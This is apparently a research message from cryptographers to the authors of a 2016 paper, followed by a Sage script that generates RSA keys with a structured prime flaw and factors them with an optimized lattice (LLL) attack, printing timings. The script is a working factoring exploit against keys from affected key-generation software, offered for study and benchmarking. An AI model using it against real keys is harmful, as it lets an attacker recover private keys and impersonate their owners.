Hi Matúš, Marek, and Petr, Thanks for the feedback, and in particular pointing out the limited range of primes shown in your 2016 paper. We still think this counts as operating from public information. :-) Here are some speedups to the "divisors in residue classes" calculation. This Sage script is now slightly faster than your announced Haswell speed: typically 5% to 25% faster, depending on N. We used Sage 8.0 compiled under Ubuntu 16.04. Sage 8.0 uses fplll 5.1.0 for LLL, and uses MPIR 3.0.0 for integer arithmetic. One of the speedups implemented here is "chaining". This means taking the LLL-reduced matrix for powers of uw+Hx and multiplying by a matrix of binomial coefficients (or actually the square). This corresponds to replacing u with u+vH (or actually u+2vH), moving from the interval [u-vH,u+vH] to a subsequent interval. Applying LLL to the product of matrices is very fast: the product is almost LLL-reduced already. Taking larger H reduces the number of intervals, saving time. Of course if H grows too large then the algorithm might fail. If the "gap" calculation in this script is correct then "guaranteed True" in the output means that H is guaranteed to work for this N. Experimentally, taking slightly larger H is still quite reliable. The dependence on N arises because comparing N to the limited range of primes usually implies a more limited range. The graphs in your 2016 USENIX paper say that the primes are usually in an even narrower interval; focusing on factoring those N's would allow further speedups. As one expects for this type of algorithm, the matrix columns are known to be multiples of 1,H,H^2,... Arithmetic would be considerably faster if these were divided out. This would require an API tweak to the LLL library to specify these weights, and a minor tweak inside the library. At a lower level, the integer arithmetic is not optimized to the extent demonstrated in papers on, e.g., fast ECC. Further speedups are clearly possible. As a starting point, simply replacing MPIR with GMP might save some time (or lose some time---we haven't benchmarked these). The values of "smooth" and "k" below are obtained from a search through many possibilities, taking account of the experimentally observed cost of LLL etc., so the values should be readjusted if the cost changes. We didn't implement the outer search through powers of 65537 modulo v. To guarantee checking only 50% of the powers in the worst case, it's important to first compute the (easy) discrete log of N modulo v and then search exponents between floor(log/2) and ceil((log+order)/2). The "avgyearsx4" output by the script is for running through all powers, so the worst case is 50% of that and the average case is 25%. ---Dan and Tanja from sage.doctest.util import Timer ttry = Timer() t = Timer() L = 27771430913146044712156219115012732149015337058745243774375474371978395728107173008782747458575903820497344261101333156469136833289328084229401057505005215261077328417649807720533310592783171487952296983742789708502518237023426083874832018749447215424764928016413509553872836856095214672430 L *= 701 # if 701 is included g = Mod(65537,L) pmin = 12*2^1020 pmax = 13*2^1020 proof.arithmetic(False) # do not bother proving primality t.start() u = lift(g^randrange(L)) while True: p = u + randrange(ceil(pmin/L),floor(pmax/L)) * L if p.is_prime(): break print 'time for first prime',t.stop().cputime t.start() u = lift(g^randrange(L)) while True: q = u + randrange(ceil(pmin/L),floor(pmax/L)) * L if q.is_prime(): break print 'time for second prime',t.stop().cputime n = p * q print 'public key',n smooth,k,H = 41902660800,5,7*2^461 m = 2*k+1 print 'smooth',smooth print 'multiplicity',k print 'lattice rank',m print 'Hbits',H.nbits() print 'H',H def lg(x): return log(1.0 * x) / log(2.0) lggamma = lg(m)/(2.0*k) + lg(2*H)*(m-1.0)/(2.0*k) + lg(n)*((k+1.0)/(2.0*m)-1) gap = lg(pmin) - lg(n) - lggamma print 'gap',gap print 'guaranteed',gap > 0 def smoothorder(l): return smooth % Mod(g,l).multiplicative_order() == 0 v = prod(l for l,e in factor(L) if smoothorder(l)) print 'v',v u = p % v print 'p residue class',u ttry.start() pmin = max(pmin,ceil(n / pmax)) pmax = min(pmax,floor(n / pmin)) pradius = (pmax - pmin) // 2 print 'n-dependent pradius bits',pradius.nbits() R. = ZZ[] u += floor((pmin + H * v - u) / v) * v # now pmin-v < u-H*v <= pmin t.start() wu = lift(u/Mod(v,n)) f = wu+H*x fpowers = [f^0] for j in range(k): fpowers += [fpowers[j] * f] print 'fpowers time',t.stop().cputime,'bits',[fi.nbits() for fi in fpowers[k].coefficients(sparse=False)] X = matrix([n]) for i in range(1,k): t.start() X = X.augment(vector(ZZ,i)) X = X.stack(vector(ZZ,fpowers[i].coefficients(sparse=False))) X = X.LLL(delta=0.3,early_red=True,use_siegel=True) print 'miniLLL time',t.stop().cputime,'bits',[[Mji.nbits() for Mji in Mi] for Mi in X] X = n * X t.start() for i in range(k,m): X = X.augment(vector(ZZ,i)) X = X.stack(vector(ZZ,[0]*(i - k) + (H^(i-k)*fpowers[k]).coefficients(sparse=False))) X = X.LLL(delta=0.6,early_red=True,use_siegel=True) print 'bigLLL time',t.stop().cputime,'bits',[[Mji.nbits() for Mji in Mi] for Mi in X] numLLL = 1 shift1 = matrix([[binomial(j,i) for i in range(m)] for j in range(m)]) shift2 = shift1*shift1 t.start() factored = false while True: # search u-Hv,...,u+Hv in steps of v # i.e. search u+vs with s being -H,...,H M0 = X[0] Q0 = sum(ZZ(z/H^i)*x^i for i,z in enumerate(M0)) Qroots = Q0.roots(ring=ZZ) for r,multiplicity in Qroots: if u+v*r > 0: g = gcd(n,u+v*r) if g > 1 and g < n: if not factored: print '----- successful factorization',[g,n/g] factored = True # could abort at this point but want to benchmark failure case u += 2*H*v if u-H*v > pmax: break X *= shift2 X = X.LLL(delta=0.6,early_red=True,use_siegel=True) numLLL += 1 print 'scan time',t.stop().cputime,'numLLL',numLLL timetry = ttry.stop().cputime print 'avgyearsx4',timetry * smooth / (86400 * 365.25)